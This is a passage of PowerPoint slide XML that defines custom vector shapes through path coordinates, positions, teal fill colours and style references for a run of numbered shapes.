                  <a:pt x="125" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="68"/>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16" name="CustomShape 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2689200" y="4108320"/>
            <a:ext cx="151920" cy="50400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="96" h="32">
                <a:moveTo>
                  <a:pt x="96" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="12"/>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17" name="CustomShape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763720" y="4125960"/>
            <a:ext cx="66240" cy="21960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="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18" name="CustomShape 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697120" y="4114800"/>
            <a:ext cx="43920" cy="15480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="28" h="10">
                <a:moveTo>
                  <a:pt x="28" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>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19" name="CustomShape 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589120" y="4129200"/>
            <a:ext cx="256680" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="162" h="55">
                <a:moveTo>
                  <a:pt x="0" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1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20" name="CustomShape 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846520" y="4119480"/>
            <a:ext cx="90000" cy="41040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="57" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>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421" name="CustomShape 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606760" y="3944880"/>
            <a:ext cx="50400" cy="194760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32" h="123">
                <a:moveTo>
                  <a:pt x="32" y="3"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="7FBFBF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="CustomShape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608200" y="3948120"/>
            <a:ext cx="42480" cy="164880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>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2" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="CustomShape 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611440" y="3949560"/>
            <a:ext cx="34560" cy="132840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="22" h="84">
                <a:moveTo>
                  <a:pt x="22" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="CustomShape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="3949560"/>
            <a:ext cx="26640" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="65">
                <a:moveTo>
                  <a:pt x="17" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="CustomShape 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="3951360"/>
            <a:ext cx="21960" cy="74160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="47">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="CustomShape 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2614680" y="3952800"/>
            <a:ext cx="14040" cy="42480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="CustomShape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790720" y="4075200"/>
            <a:ext cx="21960" cy="20160"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="13">
                <a:moveTo>
                  <a:pt x="7" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>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28" name="CustomShape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725560" y="4075200"/>
            <a:ext cx="10800" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
